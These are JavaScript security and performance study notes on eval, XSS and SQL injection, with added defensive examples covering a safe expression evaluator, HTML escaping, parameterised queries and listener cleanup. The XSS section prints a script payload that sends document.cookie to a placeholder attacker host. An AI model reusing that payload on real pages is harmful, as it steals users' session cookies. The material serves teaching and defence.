Security
Eval
let x = 10
let y = 10
let code = "x+y"
let z = eval(code)
console.log(z)
// 20
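The risk with eval is that "x+y" and a string that shuts the process down or reads a file are handled exactly the same way, because the whole JavaScript language is available to whatever text reaches it. The following added example (not part of the original notes) replaces eval with a small evaluator that only understands numbers, the four arithmetic operators, parentheses and variables looked up in an explicit object you pass in; the names `safeEval`, `tokenize` and the `vars` argument are this example's own.

```javascript
// Added example, not from the original notes: a whitelisting arithmetic
// evaluator that can do the "x+y" job without eval(). Any character or
// variable it does not know is rejected instead of executed.

// Tokenise into numbers, identifiers and the operators we allow. Anything
// else (".", "[", ";", quotes, ...) makes the sticky regex fail and we throw.
function tokenize(src) {
  const tokens = []
  const re = /\s*(?:(\d+(?:\.\d+)?)|([A-Za-z_]\w*)|([-+*/()]))/y
  let pos = 0
  src = src.trim()
  while (pos < src.length) {
    re.lastIndex = pos
    const m = re.exec(src)
    if (!m) throw new Error(`unexpected character at position ${pos}`)
    if (m[1] !== undefined) tokens.push({ type: 'num', value: Number(m[1]) })
    else if (m[2] !== undefined) tokens.push({ type: 'id', value: m[2] })
    else tokens.push({ type: 'op', value: m[3] })
    pos = re.lastIndex
  }
  return tokens
}

// Recursive-descent parser: expr -> term (('+'|'-') term)*, term -> primary (('*'|'/') primary)*.
// Variables come only from `vars` (own properties), never from the JS scope or prototype chain.
function safeEval(src, vars) {
  const tokens = tokenize(src)
  let i = 0
  const peek = () => tokens[i]
  const next = () => tokens[i++]

  function primary() {
    const t = next()
    if (!t) throw new Error('unexpected end of expression')
    if (t.type === 'num') return t.value
    if (t.type === 'id') {
      if (!Object.prototype.hasOwnProperty.call(vars, t.value)) {
        throw new Error(`unknown variable ${t.value}`)
      }
      return vars[t.value]
    }
    if (t.value === '(') {
      const v = expr()
      if (!peek() || next().value !== ')') throw new Error('missing )')
      return v
    }
    if (t.value === '-') return -primary()   // unary minus
    throw new Error(`unexpected token ${t.value}`)
  }
  function term() {
    let v = primary()
    while (peek() && (peek().value === '*' || peek().value === '/')) {
      const op = next().value
      const r = primary()
      v = op === '*' ? v * r : v / r
    }
    return v
  }
  function expr() {
    let v = term()
    while (peek() && (peek().value === '+' || peek().value === '-')) {
      const op = next().value
      const r = term()
      v = op === '+' ? v + r : v - r
    }
    return v
  }

  const result = expr()
  if (i !== tokens.length) throw new Error('trailing input')
  return result
}

// Same calculation as the eval() version above, but "process.exit(1)" is an error here.
console.log(safeEval('x+y', { x: 10, y: 10 }))   // 20
```

The `hasOwnProperty` check matters: looking up `vars[name]` directly would let an expression reach `constructor` or `__proto__` through the prototype chain. If you genuinely need to run user-supplied expressions, a small grammar like this (or a maintained expression library) is the replacement for eval, not a regex filter on the string before calling eval.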
XSS - Cross-site scripting
Steal cookie data and send it to another site
<input />
// Type in the following
<script>
console.log("XSS attack")
var img = new Image()
img.src = "http://attacker.com/steal?cookie=" + document.cookie
</script>
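The payload above only runs if the page puts the typed text back into the document as HTML. The added example below (not from the original notes) shows the vulnerable concatenation next to the escaped version; `escapeHtml`, `renderCommentUnsafe` and `renderCommentSafe` are names chosen for this example, and the sample input is the `<script>` block from the notes.

```javascript
// Added example, not from the original notes: neutralising the XSS payload by
// escaping the five HTML-significant characters before the text reaches markup.
const ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' }

function escapeHtml(untrusted) {
  return String(untrusted).replace(/[&<>"']/g, ch => ESCAPES[ch])
}

// Vulnerable: untrusted input is concatenated straight into markup, so a
// <script> tag in the input becomes a <script> tag in the page.
function renderCommentUnsafe(comment) {
  return '<p class="comment">' + comment + '</p>'
}

// Hardened: same markup, but the input is escaped first and renders as text.
function renderCommentSafe(comment) {
  return '<p class="comment">' + escapeHtml(comment) + '</p>'
}

// Constructed sample input: the payload from the notes above.
const payload = '<script>console.log("XSS attack")</script>'

console.log(renderCommentUnsafe(payload))   // contains a live <script> tag
console.log(renderCommentSafe(payload))     // &lt;script&gt;... shown as literal text
```

In the browser, assigning the input to `element.textContent` (rather than `innerHTML`) achieves the same result without a hand-written escaper. Independently of output escaping, a session cookie set with the `HttpOnly` flag is not exposed through `document.cookie`, so even a payload that does execute cannot read it the way the snippet above tries to.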
SQL injection
<input />
// This code gets pasted into an input
SELECT first_name, age, email, contact_number FROM Customer;
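Injection happens when the input is spliced into the SQL text, so that a quote in the input changes where the string literal ends. The added example below (not from the original notes) contrasts a string-built query with a parameterised one without using a real database: both functions just return what would be handed to a driver. `findCustomerUnsafe`, `findCustomerSafe`, `quoteBalanced` and `looksLikeEmail` are this example's own names; the `?` placeholder style is the one used by the mysql2 and sqlite3 drivers (pg uses `$1`).

```javascript
// Added example, not from the original notes: the same Customer lookup built
// two ways. No database is involved; we only inspect what would be sent.

// Vulnerable: the input becomes part of the SQL text. Any quote in it ends
// the literal early and the rest of the input is parsed as SQL.
function findCustomerUnsafe(email) {
  return "SELECT first_name, age, email, contact_number FROM Customer WHERE email = '" + email + "'"
}

// Hardened: the SQL text is fixed at write time and the input travels
// separately as a bound value, so the driver never parses it as SQL.
function findCustomerSafe(email) {
  return {
    text: 'SELECT first_name, age, email, contact_number FROM Customer WHERE email = ?',
    values: [email]
  }
}

// Quick structural check used below: a statement with an odd number of
// single quotes has had a literal broken open by its input.
function quoteBalanced(sql) {
  return (sql.match(/'/g) || []).length % 2 === 0
}

// Input validation is a second layer, not a replacement for parameters:
// an apostrophe is legal in an e-mail address and must still be handled safely.
function looksLikeEmail(s) {
  return typeof s === 'string' && s.length <= 254 && /^[^\s@]+@[^\s@]+\.[^\s@]+$/.test(s)
}

// Constructed sample: an ordinary, valid value that happens to contain a quote.
const input = "o'brien@example.com"

console.log(findCustomerUnsafe(input))          // literal ends after "o", query is now malformed
console.log(findCustomerSafe(input))            // text unchanged, value carried in `values`
```

The point of the `quoteBalanced` check is only to make the failure visible: the concatenated query breaks on a perfectly legitimate address, and the same mechanism is what an attacker exploits. The parameterised form does not need to know anything about quoting because the input never reaches the SQL parser.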
Best Practices for Security
- Input Validation: validate and sanitise user input to prevent XSS (cross-site scripting) and SQL injection attacks.
- Avoid EVAL
- Always use HTTPS rather than HTTP
- Authentication and Authorisation: use strong password hashing algorithms.
Best Practices for Performance
- Minimize request size: Combine and minify JavaScript code into a single compressed file - use a module bundler.
- Use asynchronous operations: use callbacks, promises or async/await to perform asynchronous operations and avoid blocking the main thread.
- Use React to minimise DOM manipulations
- Avoid memory leaks - remove event listeners etc
- Cache frequently used data in memory or browser storage.
- Lazy load modules: only load resources when needed.
- Compress images
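A listener that is never removed keeps its closure, and everything the closure references, alive for as long as the target does. The added example below (not from the original notes) shows the "remove event listeners" tip as a pattern: the function that subscribes also hands back a `dispose` function, so cleanup is part of its interface. `attachCounter` and `demo` are names chosen here, and a bare `EventTarget` stands in for a DOM element so the code runs outside a browser.

```javascript
// Added example, not from the original notes: subscribing and unsubscribing
// with the same handler reference so the listener (and its state) can be freed.
function attachCounter(target) {
  const state = { clicks: 0 }          // state captured by the handler's closure
  const onClick = () => { state.clicks += 1 }
  target.addEventListener('click', onClick)
  return {
    count: () => state.clicks,
    // removeEventListener needs the identical function object that was
    // registered; an anonymous inline arrow could never be removed.
    dispose: () => target.removeEventListener('click', onClick)
  }
}

// Constructed stand-in for a button: EventTarget and Event exist in browsers
// and in Node, so the same code runs in both.
function demo() {
  const button = new EventTarget()
  const counter = attachCounter(button)
  button.dispatchEvent(new Event('click'))
  button.dispatchEvent(new Event('click'))
  const before = counter.count()
  counter.dispose()
  button.dispatchEvent(new Event('click'))   // no longer observed
  return { before, after: counter.count() }
}

console.log(demo())   // { before: 2, after: 2 }
```

In a component framework the `dispose` call belongs in the unmount or cleanup hook; with a long-lived target such as `window` or a shared event bus, forgetting it leaks one handler and one copy of its state per mount.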